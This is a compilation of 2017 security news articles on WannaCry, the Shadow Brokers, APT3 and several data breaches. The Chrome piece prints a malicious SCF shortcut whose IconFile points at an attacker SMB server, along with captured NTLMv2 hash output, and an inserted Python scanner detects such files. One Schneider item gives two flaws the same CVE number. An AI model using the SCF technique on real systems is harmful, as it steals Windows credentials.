According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


WordPress Launches Public Bug Bounty Program

18.5.2017 securityweek Safety
The WordPress security team announced this week the launch of a public bug bounty program that covers the WordPress content management system (CMS) and several related assets.

WordPress has been running a private bug bounty program for roughly seven months and it has now decided to make it public.

The program is hosted on the HackerOne platform and it covers the WordPress CMS and other open-source projects, including BuddyPress, bbPress and GlotPress. Researchers can also report flaws discovered in the WordPress.org (including subdomains), WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.

White hat hackers have been advised to submit vulnerability reports that include detailed information on the flaw and proof-of-concept (PoC) code. Participants have also been asked to avoid privacy violations and causing damage to live WordPress sites, and give developers a reasonable amount of time to address security holes before their details are made public.

The list of vulnerabilities that experts can report includes cross-site scripting (XSS), cross-site request forgery (CSRF), server-side request forgery (SSRF), remote code execution and SQL injection.

The bug bounty program does not cover vulnerabilities affecting plugins – these should be reported to the plugin’s developer, but the WordPress plugins team should be alerted as well.

While exceptions may exist, the WordPress security team says it’s typically not interested in basic information disclosure issues, mixed content warnings, lack of HTTP security headers, brute force attacks, XSS flaws that can only be exploited by users with elevated privileges, and reports generated by automated scans.

The WordPress security team has not provided any information on rewards, but it did say that seven researchers have so far earned more than $3,700, which indicates an average of roughly $500 per vulnerability report. The bounties will be paid out by Automattic, the company behind WordPress.com, which runs its own bug bounty program on HackerOne.

According to WordPress developers, the CMS currently powers more than a quarter of the top ten million websites on the Internet. Given the platform’s popularity, it’s no surprise that researchers often find security holes, including serious vulnerabilities that end up being exploited to hack thousands of websites.

Hopefully, the launch of a public bug bounty program will streamline vulnerability reporting to avoid the disclosure of unpatched flaws by researchers who are frustrated with the lack of communication.


Ukraine's Presidency Says Website Attacked by Russia

18.5.2017 securityweek Hacking
The Ukrainian presidency said its website had been attacked by Russia in apparent retaliation for Kiev's decision to block prominent Moscow-based social networks.

"We have been witnessing the Russian response to the president's decree about closing access to Russian social networks," President Petro Poroshenko's deputy administration chief Dmytro Shymkiv said in a statement posted late Tuesday on Facebook.

"The president's website has sustained an organised attack."

Shymkiv added that IT specialists had the situation under control and that the website was no longer under threat. It was accessible on Wednesday in Kiev.

Kremlin spokesman Dmitry Peskov called Kiev's accusations unfounded.

"The absence of anything concrete (in Ukraine's claim) once again confirms the absolute baselessness of such accusations," Peskov told reporters.

IT specialists and Western governments are rarely able to pin a hacking attack directly on the Kremlin but often accuse groups or individuals close to the Russian government of being responsible for them.

Ukraine on Tuesday blocked Russia's most popular social media networks and an internet search engine in response to the Kremlin's backing of a three-year separatist war in the east and annexation of Crimea in March 2014.

The decision sparked an outcry from Ukrainian internet users and freedom of speech advocates.

"In a single move Poroshenko dealt a terrible blow to freedom of expression in Ukraine," Human Rights Watch researcher Tanya Cooper said.

"It's an inexcusable violation of Ukrainians' right to information of their choice," she said in a statement Wednesday.

It also sowed confusion among Ukraine's internet providers about how precisely such a ban would work.

The Internet Association of Ukraine sent a letter to Poroshenko and top government agencies asking how it should proceed since the former Soviet republic had no laws setting guidelines for blocking traffic to specific websites.

Several of the banned Russian social media sites published instructions to their users explaining how they could circumvent the ban by using open-access internet technologies.


APT3 Hackers Linked to Chinese Ministry of State Security

18.5.2017 securityweek APT
Independent researchers and experts from threat intelligence firm Recorded Future are confident that the cyber espionage group tracked as APT3 is directly linked to the Chinese Ministry of State Security (MSS).

While much of the security community typically tries to avoid making attribution statements, arguing that false flags make this task difficult, there are some individuals and companies that don’t shy away from accusing governments of conducting sophisticated cyberattacks.

A mysterious group called “intrusiontruth,” which claims to focus on investigating some of the most important advanced persistent threat (APT) actors, has recently published a series of blog posts on APT3, a group that is also known as UPS Team, Gothic Panda, Buckeye and TG-0110.

The cyberspies, believed to be sponsored by China, have been active since at least 2009, targeting many organizations in the United States and elsewhere via spear-phishing, zero-day exploits, and various other tools and techniques. Researchers noticed last year that APT3 had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

Intrusiontruth has conducted an analysis of APT3’s command and control (C&C) infrastructure, particularly domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Both these individuals are listed as shareholders for a China-based security firm called the Guangzhou Boyu Information Technology Company, or Boyusec. In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that this company had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

Intrusiontruth concluded that either Boyusec has two shareholders with the same name as members of APT3, or Boyusec is in fact APT3, which is the more likely scenario.

Recorded Future has dug deeper to find more evidence connecting APT3 to China’s MSS. In a report published on Wednesday, the company said it had attributed the group directly to the MSS with “a high degree of confidence.”

Researchers pointed out that in addition to Huawei, which claimed to use Boyusec for security evaluations of its corporate intranet, Boyusec was also a partner of the Guangdong Information Technology Security Evaluation Center (Guangdong ITSEC), and the organizations have been collaborating on an active defense lab since 2014.

Guangdong ITSEC is apparently a subordinate of the China Information Technology Evaluation Center (CNITSEC), which, according to academic research, is run by the Ministry of State Security.

Experts believe many of the ministry’s subordinates, particularly ones at provincial and local levels, have legitimate public missions and act as cover for intelligence operations.

“Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the resources and technology of the Chinese government. In this real-life David vs. Goliath situation, customers need both smart security controls and policy, as well as actionable and strategic threat intelligence,” Recorded Future said in its report.


Schneider Patches Flaws in VAMPSET, SoMachine Products

18.5.2017 securityweek Vulnerability
Updates released by Schneider Electric for its VAMPSET and SoMachine HVAC products patch several medium and high severity vulnerabilities that can be exploited for denial-of-service (DoS) attacks and arbitrary code execution.

Advisories describing the flaws were published recently by both ICS-CERT and Schneider Electric.

One of the advisories focuses on a medium severity memory corruption vulnerability affecting VAMPSET, a piece of software used to configure and maintain protection relays and arc flash protection units. The bug, tracked as CVE-2017-7967, can be triggered using a specially crafted settings file (.vf2).

“This vulnerability causes the software to halt or not start when trying to open the corrupted file,” Schneider wrote in its advisory. “As Windows operating system remains operational and VAMPSET responds, it is able to be shut down through its normal closing protocol.”

According to Fortinet’s Kushal Arvind Shah, the researcher who reported the flaw to the vendor, an attacker may also be able to exploit the weakness for arbitrary code execution.

The flaw has been addressed with the release of VAMPSET 2.2.189. All previous versions are affected.

Separate advisories describe two high severity vulnerabilities found by independent researchers in Schneider’s SoMachine HVAC product, programming software for Modicon logic controllers. Both security holes have been patched with the release of SoMachine HVAC 2.2.

One of the flaws, CVE-2017-7966, has been described as a DLL hijacking issue that can be exploited by a remote, unauthenticated attacker to execute arbitrary code by planting a malicious library that would get executed instead of the legitimate file.

The second vulnerability, classified as a stack-based buffer overflow and tracked as CVE-2017-7966, is related to a component named AlTracePrint.exe. Schneider and ICS-CERT have not shared any details, but mentioned that the component can be called in a way that leads to a buffer overflow and a crash.

Last month, researchers from Germany-based OpenSource Security disclosed a couple of critical vulnerabilities in Schneider’s Modicon and SoMachine products before the vendor released patches.

The experts reported the flaws to the company in December and decided to make their findings public after not receiving any feedback. Schneider admitted making a mistake and promised to release fixes in mid-June.


What's Driving Stress Levels of Security Operations Teams?

18.5.2017 securityweek Security
Security Operations Teams Are Overwhelmed by Vulnerabilities and Volume of Threat Alerts, Study Finds

One of the reasons the WannaCrypt ransomware spread so far and so fast is that it leveraged what was for some Windows users a 0-day exploit, and for others an n-day exploit. For users of unsupported Windows versions, it was 0-day -- there had been no patch. But for many users of supported versions of Windows, it was an n-day exploit; that is, the exploit was used during the variable number n of days between a patch being issued by Microsoft and the patch being implemented by the user.

N-day exploits are an increasing problem because, if anything, the time between issue and implementation of patches is increasing.

A new study, prepared for Bay Dynamics by EMA and published today, helps to explain why this is happening. Bay Dynamics, a maker of cyber risk analytics software, completed a $23 million Series B financing round in July 2016.

Four hundred security professionals ranging from management to operational staff in mid-market, enterprise and very large enterprise organizations and representing a wide range of industry sectors were questioned about stress in their daily lives.

What emerged, in a nutshell, is that operations staff are overwhelmed by the sheer volume of vulnerabilities; they are falling behind in efforts to remediate them; and tend to under-report the problem to their seniors.

To put this into context, on average, a mid-market firm might have 10 full-time staff servicing ten new vulnerabilities per month across just under 2,000 assets (almost 20,000 vulnerabilities to service every month). For a very large enterprise those figures translate to 100 staff servicing more than 1.3 million vulnerabilities every month. Seventy-four per cent of security teams admit they are overwhelmed by the volume of maintenance work required.

Since full and timely patching is an impossibility, security teams are required to prioritize their efforts -- but this is also a problem. Nearly 80% of the respondents admitted that their patching approval process is significantly manual. "This," notes the report, "included emails, spreadsheets, and other electronic documents for tracking and approval. With the volumes of patching that have to be reviewed, these labor intensive manual steps drive high inefficiencies and stress."

To be fair, 'too many vulnerabilities' is not considered to be the primary stress driver for security teams. It ties in second place (at 21%) with stress caused by management, one point behind the primary cause of stress, 'not enough manpower'. The report postulates that security teams "are creating a security facade around their security program maturity. This could be a natural extension of what they are conveying to their upper management."

If this is true, it would go a long way to explain the often-discussed disparity between operations staff and senior management over the maturity of an organization's security posture: senior management invariably claims a more mature posture than that reported by security operations.

The survey also makes clear that the prioritization of vulnerabilities and threats is also problematic. Sixty-eight percent of respondents prioritize vulnerabilities based on their severity. This severity is relatively easy to gauge from the vendor's alert and the IT infrastructure. Threats, however, are a little different.

Fifty-eight respondents prioritize vulnerabilities based on the severity of identified threats -- but 52% of threat alerts are improperly prioritized by systems and must be manually reprioritized.

"While severity of alerts should be a key indicator of how both vulnerabilities and threats should be prioritized for action by operations," suggests the report, "it is not the only factor and should not be considered the primary indicator unless the prioritization algorithm has sufficient context within its framework."

The problem here is that the majority of current alerting systems, such as SIEMs, do not usually provide sufficient context for automatic priority decision-making. Newer machine-learning anomaly detection systems have the potential, eventually, to provide better and more complete context; but for now, they are known to create a high level of false positives.

The difficulty in being able to automatically and correctly prioritize vulnerabilities is delaying their solution. Analysts are spending between 24 and 30 minutes investigating each alert; and are falling behind. Sixty-four percent of alert tickets are not worked per day, and analysts are continuously falling further behind in their workload -- explaining why 'dwell time' for breaches is over six months.

There are two possible solutions. The first is more manpower -- but given the sparsity of suitable security analysts, this would be difficult. The second is automation through better security tools.

"To succeed," suggests the report, "tools must be made smarter by providing more useful context around the technical, financial, and behavioral aspects of the incidents. This will reduce the number of false positives and misclassified alerts so that only the real, most critical threats are at the top of the investigation pile." If this can be achieved, "a day in the life of a security pro will become significantly less stressful." And the next WannaCrypt perhaps a little less successful.


WannaCry Ransomware Creators Make Rookie Mistake

18.5.2017 securityweek Ransomware
WannaCry Ransomware Didn't Utilize Trackable Bitcoin Wallets

A bug in the WannaCry ransomware prevented the malicious application from generating individual Bitcoin wallets to collect payments from each of its victims, security researchers have discovered.

WannaCry began wreaking havoc worldwide on May 12, courtesy of a worm component abusing the NSA-linked EternalBlue exploit. Targeting an already addressed Windows SMB vulnerability, the exploit allowed an otherwise run-of-the-mill ransomware to become an international threat within hours.

An earlier WannaCry version appears connected to North Korean threat group Lazarus, but the variant used in the still ongoing campaign has nothing out of the ordinary, researchers say. In fact, researchers have already discovered bugs in the malware's code, although the encryption routine hasn’t been cracked as of now.

In a recent tweet, Symantec Security Response reveals that a race condition bug prevented the malware from using a unique Bitcoin address for every victim. The issue resulted in the ransomware using only three wallets for collecting ransom payments, which prevents its operators from tracking the payments to specific victims.

In a tweet posted on 16 May 2017, Symantec Security Response (@threatintel) wrote: "#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug"

Security experts have warned countless times against paying the ransom in the event of a ransomware attack, as making a payment does not guarantee that files will be restored. When it comes to the WannaCry attack, it is unlikely that victims would get their files back after paying the ransom.

More than 260 payments have been made to the three Bitcoin addresses associated with the ransomware, allowing the crooks to collect an estimated $78,000 to date from this campaign alone.

According to a recent tweet from Symantec, WannaCry attackers released a version that fixed the Bitcoin bug soon after the original variant, but most infections contain the flaw. However, the attempt to resolve the bug shows that the hackers’ “main goal was to make money,” the security firm says.

Patches, malware and kill-switch slowed the infection

Over 200,000 computers are estimated to have been hit by the ransomware, but that number could have been much higher if it wasn’t for several conditions, starting with the fact that the attack unfolded heading into a weekend, when many vulnerable computers were offline. Microsoft issuing an emergency patch to address the flaw in older Windows versions also helped.

In a rather strange twist of events, a crypto-currency mining botnet that has been spreading using the very same vulnerability might have limited WannaCry’s infection as well. Dubbed Adylkuzz, the botnet blocks SMB networking immediately after infection, thus preventing other malware from compromising the machine using EternalBlue.

More importantly, a great many attacks were stopped because security researcher @MalwareTechBlog registered a domain the ransomware would beacon to before starting the infection. The domain acts as a kill-switch, as the malware terminates its process when receiving a response from it. A WannaCry variant with no kill-switch was also observed, apparently patched in a hex editor.

While that variant was supposedly the work of the same cybercriminals, since the hardcoded Bitcoin wallets were left unchanged, newer samples feature different addresses, Bitdefender senior e-threat analyst Bogdan Botezatu told SecurityWeek. These variations are believed to come from different crooks and they too were patched on the fly (not recompiled), Botezatu said.

Hundreds of thousands vulnerable and no free decryptor

The kill-switch domain also works as a sinkhole, and data gathered from it reveals that the WannaCry attacks are ongoing, with over 300,000 infections stopped over the past 24 hours, a live tracker shows. The number includes repeated incidents involving the same individual machines, but the number of vulnerable devices is believed to be in the hundreds of thousands.

“We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher),” Rapid7’s Roy Hodgman says.

Because of the encryption implementation in WannaCry, decrypting files for free isn’t possible at the moment, although there might be tools claiming they can restore users’ data, Symantec says. The malware uses two hardcoded public keys, one for demo decryption purposes, and another for the main encryption process.

“Once the malware is running on the victim machine it will generate a new unique RSA 2048 bit asymmetric key pair. This means that each victim needs their own decryption key,” the security firm notes.

After generating the new key pair, the malware exports the public RSA key to a local file, then exports the private RSA key and encrypts it with the hardcoded attacker public key, after which it stores it in another file on disk. Next, it destroys the private key in memory and, because “the lifetime of private victim RSA keys is so limited there is no good option to recover it later once the encryption has happened,” Symantec says.

Because not all files are encrypted using the victim’s RSA public key, for which the private key has been securely encrypted and stored locally, there are tools that can restore some of the victims’ files. According to Symantec, however, only some of the files are actually decryptable.

Some files are recoverable

The good news, however, is that some files can be recovered, especially on older Windows XP versions. While the malware overwrites files stored in Desktop, My Documents, or on any removable disks in the computer at the time of the infection and then deletes them, thus preventing undelete or disk recovery tools from restoring them, it doesn’t do the same for files stored outside these three locations.

For the other locations, the malware moves the files to a temporary folder and then deletes them normally, without overwriting them using a wiper. This means that files might be recoverable, but “the recovery ratio may vary from system to system because the deleted file may be overwritten by other disk operations,” Symantec says.

On Windows XP versions SP1 and SP2, because of a pseudo-random number generator (PRNG) vulnerability addressed in Windows XP SP3, one could “predict encryption keys that would be created in the future and, crucially, reveal keys that had been generated in the past.” By exploiting the flaw, an individual could reveal the decryption key in memory, but only if WannaCry is still running.


Over 200 Brooks Brothers Stores Hit by Payment Card Breach

18.5.2017 securityweek Hacking
U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers and other personally identifiable information were not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.


Cisco Starts Assessing Its Products Against the WannaCry Vulnerability
18.5.2017 securityaffairs Ransomware

The tech giant Cisco has announced an investigation into the potential impact of the WannaCry malware on its products.
Recent massive WannaCry ransomware attack highlighted the importance of patch management for any organization and Internet users.

Cisco, another tech giant, announced it is investigating the potential impact of the WannaCry malware on its products, especially on solutions that can’t be patched to fix the flaw exploited by the malware.

It is an important initiative started by the company that intends to protect its customers with the assessment of its products.

The Cisco Product Security Incident Response Team (PSIRT) announced the investigation on Monday.

“The Cisco PSIRT Team is continuing to investigate the impact of this vulnerability on Cisco products that have not reached end of software maintenance support and that do not support automated or manual updates of the Microsoft patch for these vulnerabilities. Investigation is expected to be completed by Friday, May 19th.” states the announcement. “Currently no products have been found to prevent the automatic or manual installation of the MS17-010 patches or not function properly with the MS17-010 patches applied.”

According to CISCO’s announcement, its experts will investigate the impact of the MS17-010 bug on products that don’t support either manual or automated updates.


The company aims to discover products that can’t be fixed.

“Currently no additional guidance other than to apply the Microsoft patches or disable SMBv1 is applicable.” continues the advisory.

CISCO published Snort rules (42329-42332, 42340, 41978) and a Cisco IPS (Intrusion Prevention System) signature pack to mitigate the threat and block WannaCrypt traffic.

Let’s hope that other IT vendors that ship products running Windows will also start assessing their products.


DocuSign Data Breach Led to Targeted Email Malware Campaign
17.5.2017 thehackernews Virus
While we were all busy with the WannaCry ransomware menace, two separate data breaches were reported, one at DocuSign, a major provider of electronic signature technology, and another at BELL, Canada’s largest telecommunications company.
In a notice on its website on Tuesday, DocuSign confirmed a breach at one of its email systems when investigating the cause of an increase in DocuSign-impersonating phishing emails.
"A malicious third party had gained temporary access to a separate, non-core system that allows us to communicate service-related announcements to users via email," DocuSign said in the announcement.
What Happened?
An unknown hacker or group of hackers managed to breach one of the electronic signature technology provider's email systems and steal a database containing the email addresses of DocuSign customers.
The attackers then used the stolen data to conduct an extensive phishing campaign targeting DocuSign's users over the past week.
The phishing email masqueraded as documents sent from another company with the subject line "Completed *company name* – Accounting Invoice *number* Document Ready for Signature," needing a digital signature from the recipient.
The emails, sent from domains including dse@docus.com, included a downloadable Microsoft Word document, which when clicked, installs "macro-enabled-malware" on the victim's computers.
What type of information?
The company said only email addresses of its customers had been accessed in the breach.
However, DocuSign assured its customers that no names, physical addresses, passwords, social security numbers, credit card information or any other information had been accessed by the attackers.
"No content or any customer documents sent through DocuSign's eSignature system was accessed; and DocuSign's core eSignature service, envelopes and customer documents, and data remain secure," the company stressed.
How many victims?
The number of victims affected by the phishing campaign has not been confirmed, but DocuSign encourages its customers to use the DocuSign Trust Center to help them protect themselves and their employees from phishing attacks.
"Right now we are still acting on the results of our ongoing investigation and cannot comment on those details," the company said.
What is DocuSign doing?
In an attempt to protect its customers, DocuSign has immediately restricted unauthorized access to its system and put further security controls in place to harden the security of its systems.
The company is also actively working with law enforcement authorities on the investigation of this matter.
What should DocuSign customers do?
DocuSign recommended its users to delete any email with the following subject line:
Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature
Completed: [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.
If you receive any suspicious email, you should forward it to the company's spam address, advised DocuSign.
Also, if the email looks like it has come from DocuSign, just do not respond to that email or click on any link provided in the message.
Instead, access your documents directly by visiting the official DocuSign website and entering the unique security code provided at the bottom of every legitimate DocuSign email.
The company also informed its users that DocuSign never asks recipients to open any PDF, Office document or ZIP file in an email. Last but not least, always make sure your antivirus software is up to date.


Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome
17.5.2017 thehackernews Hacking
A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google's Chrome running on any version of Microsoft's Windows operating system, including Windows 10, that could allow remote hackers to steal user's login credentials.
Researcher Bosko Stankovic of DefenseCode has found that merely visiting a website containing a malicious SCF file could cause victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.
This technique is not new: it was exploited by Stuxnet, a powerful piece of malware specifically designed to destroy Iran's nuclear program, which used Windows shortcut (LNK) files to compromise systems.
What makes this attack different from others is that such SMB authentication-related attacks have now been publicly demonstrated on Google Chrome for the first time, after Internet Explorer (IE) and Edge.
Chrome + SCF + SMB = Stealing Windows Credentials
The SCF (Shell Command File) shortcut file format works similarly to LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials," Stankovic wrote in a blog post, describing the flaw.
Basically, a shortcut on your desktop is a text file with a specific syntax of shell commands that defines the location of the icon/thumbnail, the application's name and its location.
[Shell]
Command=2
IconFile=explorer.exe,3
Since Chrome trusts Windows SCF files, attackers can trick victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.
As soon as the user opens the folder containing that downloaded file, immediately or later, this file automatically runs to retrieve an icon without the user having to click on it.
But instead of setting the location of an icon image, the malicious SCF file created by the attacker contains the location of a remote SMB server (controlled by the attacker).
[Shell]
IconFile=\\170.170.170.170\icon
So, as soon as the SCF file attempts to retrieve the icon image, Windows is tricked into automatically authenticating to the attacker-controlled remote server over the SMB protocol, handing over the victim's username and a hashed version of the password, which allows the attacker to use those credentials to authenticate to the victim's personal computer or network resources.
"Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares," Stankovic said.
But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources, so they would no longer be vulnerable to attacks that make them load malicious content from outside servers.
However, SCF files were left alone.
Exploiting LM/NTLM Hash Authentication via SCF File
[Image: Exploiting LM/NTLM Hash Authentication. Image Source: SANS]
But why would your Windows PC automatically hand over your credentials to the server?
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in four steps:
1. The Windows user (client) attempts to log into a server.
2. The server responds with a challenge value, asking the client to encrypt the challenge with its password hash and send it back.
3. Windows handles the SCF request by sending the client’s username and the hashed version of the password to the server.
4. The server then captures that response and approves authentication if the client's password hash is correct.
Now, in the SCF attack scenario elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically, providing the victim's username and NTLMv2 password hashes (the credentials of a personal computer or network resource) to the server, as described in step 3 above.
If the user is part of a corporate network, the network credentials assigned to the user by his company's sysadmin will be sent to the attacker.
If the victim is a home user, the victim's Windows username and password will be sent to the attacker.
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
No doubt, the credentials are hashed rather than sent in the clear, but the captured response can be "brute-forced" later to retrieve the original login password in plain text.
"It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings," the researcher said. "Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files."
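A defender-side check for the two tell-tale traits described above (an IconFile that points at a remote SMB host, and a double extension such as picture.jpg.scf that Explorer displays without the .scf suffix), written as an added example rather than code from the article or from Stankovic's research. It parses the [Shell] section in the syntax the article shows, flags suspicious files under a directory, and runs against two constructed sample files written to a temporary folder; the sample contents and the DISGUISE_EXTS list are assumptions for illustration.

```python
"""Scan a directory for SCF files that would trigger SMB authentication to a remote host."""
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# A UNC path: \\host\share... or //host/share...
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)")
# Extensions commonly placed before ".scf" so the file looks like a document or image (assumed list)
DISGUISE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".txt"}


@dataclass
class Finding:
    path: str
    remote_host: Optional[str]   # host named in IconFile when it is a UNC path
    disguised: bool              # e.g. picture.jpg.scf, shown by Explorer as picture.jpg
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_scf(text: str) -> Dict[str, str]:
    """Return key=value pairs from the [Shell] section; keys are lower-cased."""
    values: Dict[str, str] = {}
    in_shell = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_shell = line[1:-1].strip().lower() == "shell"
            continue
        if in_shell and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def remote_icon_host(icon_file: str) -> Optional[str]:
    """Host part of IconFile if it is a UNC path, else None (local, e.g. explorer.exe,3)."""
    target = icon_file.split(",", 1)[0].strip().strip('"')   # drop the ",<icon index>" suffix
    m = UNC_RE.match(target)
    return m.group(1) if m else None


def assess_scf(path: str, text: str) -> Finding:
    """Build a Finding for one SCF file from its name and contents."""
    name = os.path.basename(path)
    inner_ext = os.path.splitext(os.path.splitext(name)[0])[1].lower()
    disguised = inner_ext in DISGUISE_EXTS
    host = remote_icon_host(parse_scf(text).get("iconfile", ""))
    finding = Finding(path, host, disguised)
    if host:
        finding.reasons.append(f"IconFile points at remote SMB host {host}")
    if disguised:
        finding.reasons.append(f"double extension hides .scf behind {inner_ext}")
    return finding


def scan_directory(root: str) -> List[Finding]:
    """Assess every *.scf file under root and return only the suspicious ones."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(".scf"):
                full = os.path.join(dirpath, fname)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    finding = assess_scf(full, fh.read())
                if finding.suspicious:
                    findings.append(finding)
    return findings


# Constructed samples, not real captured files: the first mirrors the article's benign
# "Show Desktop" shortcut, the second its attacker-controlled variant.
SAMPLES = {
    "Show Desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n",
    "picture.jpg.scf": "[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n",
}


def demo() -> List[Finding]:
    """Write the samples to a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for fname, body in SAMPLES.items():
            with open(os.path.join(tmp, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_directory(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f.path, "->", "; ".join(f.reasons))
```

Point `scan_directory` at a Downloads folder or a shared drive to triage files that arrived via browser auto-download; the benign sample is not reported, while the second is flagged twice, once for the UNC IconFile and once for the hidden extension.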
No Need to Decrypt Password *Sometimes*
Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.
Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations, as they let attackers impersonate one of their members and immediately reuse the gained privileges to escalate access, take control of IT resources and attack other members.
How to Prevent Such SMB Authentication-related Attacks
Simply block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN at the firewall, so that local computers cannot query remote SMB servers.
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the "Ask where to save each file before downloading" option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to the users.


Bell Canada Hacked: Data of 1.9 Million Customers Stolen
17.5.2017 thehackernews Hacking
While we were all busy with the WannaCry ransomware menace, two separate data breaches were reported, one at DocuSign, a major provider of electronic signature technology, and another at Bell, Canada's largest telecommunications company.
Canadian mobile phone, TV, and internet service provider Bell on Monday confirmed that the company had been hit by an unknown hacker who has managed to access its customer information illegally.
In a brief statement released by Bell Canada, the company said an unknown hacker managed to get his hands on the data of millions of Bell customers.
However, the company did not say from which particular service the compromised customer details were pulled.
The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.
How Many Victims Were Affected?
Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.
"The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers," the company said.
However, Bell assured its customers that there's no indication of hacker's access to "financial, password or other sensitive personal information," and that the incident is not linked to the global WannaCry ransomware attacks.
What's the Missing Link?
The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.
"We are releasing a significant portion of Bell.ca's data due to the fact that they have failed to [co-operate] with us," reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.
"This shows how Bell doesn't care for its [customers'] safety and they could have avoided this public announcement… Bell, if you don't [co-operate], more will leak :)."
